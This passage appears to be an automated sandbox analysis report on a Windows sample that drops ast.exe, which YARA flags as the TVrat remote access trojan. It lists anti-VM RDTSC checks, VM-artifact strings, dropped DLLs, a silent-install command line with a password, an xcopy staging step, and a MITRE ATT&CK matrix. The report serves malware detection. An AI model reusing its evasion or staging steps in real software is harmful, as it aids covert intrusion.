                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Tries to delay execution (extensive OutputDebugStringW loop)
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeSection loaded: OutputDebugStringW count: 1837
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRDTSC instruction interceptor: First address: 69B27E second address: 69B284 instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRDTSC instruction interceptor: First address: 69B284 second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F86D453B8C6h 0x00000006 sub eax, ebx 0x00000008 mov dword ptr [ebp-04h], eax 0x0000000b mov ecx, 0000000Ah 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRDTSC instruction interceptor: First address: 69B294 second address: 69B29A instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F86D453B8C6h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F86D453B8D5h 0x0000000d mov dword ptr [ebp-04h], eax 0x00000010 dec ecx 0x00000011 jne 00007F86D453B8B9h 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeRDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F86D453B8C6h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F86D453B8D5h 0x0000000d dec ecx 0x0000000e jne 00007F86D453B8B9h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWindow / User API: threadDelayed 1473Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_10-26681
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-2G518.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-VCJTB.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\msvcr120.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-KGLTC.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-JCPUK.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libeay32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-88TFK.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-951GK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-5IUGA.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\astrct.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libjpeg-turbo-win.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\astclient.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-SD6OU.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-PDD2G.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\aw_sas32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-UA1D6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-4POLO.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\opus.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-82POG.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\astrct.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\hatls.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-2EBQK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-ND9BQ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\opus.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe TID: 7012Thread sleep time: -710000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeFile opened: PhysicalDrive0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeThread sleep count: Count: 1473 delay: -10Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 11_2_07065021 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_07065021
                          Source: ast.exe.9.drBinary or memory string: VMware
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                          Source: ast.exe.9.drBinary or memory string: VBoxService.exe
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: wjpP1EOX0L.tmp, 00000001.00000002.1718627243.00000000006EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{L
                          Source: ast.exe.9.drBinary or memory string: VMWare
                          Source: ast.exe.9.drBinary or memory string: VBoxService.exeU
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B91EB81 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B91EB81
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B90AE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B90AE50
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B931C01 mov eax, dword ptr fs:[00000030h]10_2_6B931C01
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B92C43E mov eax, dword ptr fs:[00000030h]10_2_6B92C43E
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B91EB81 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B91EB81
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B92EFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B92EFE1
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B91DC3A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6B91DC3A
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1mJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe" Jump to behavior
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.drBinary or memory string: Shell_TrayWndSVW
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.drBinary or memory string: Shell_TrayWnd
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.drBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.drBinary or memory string: Shell_TrayWndTrayNotifyWndSV
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B91ED5B cpuid 10_2_6B91ED5B
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B92FBD1 GetSystemTimeAsFileTime,10_2_6B92FBD1
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: ast.exe, 0000000B.00000003.2498022961.0000000007063000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: PROCEXP.EXE

                          Stealing of Sensitive Information

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B906D50 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,curl_msnprintf,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket,10_2_6B906D50
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8D39A0 curl_pushheader_bynum,inet_pton,htons,inet_pton,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,10_2_6B8D39A0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8DEEA0 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,inet_pton,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,curl_pushheader_bynum,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,curl_msnprintf,curl_easy_strerror,curl_easy_strerror,10_2_6B8DEEA0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts2
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		OS Credential Dumping1
                          System Time Discovery                          		Remote Services12
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          Data Encrypted for Impact
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		12
                          Process Injection                          		3
                          Obfuscated Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop ProtocolData from Removable Media21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Software Packing                          		Security Account Manager133
                          System Information Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading                          		NTDS331
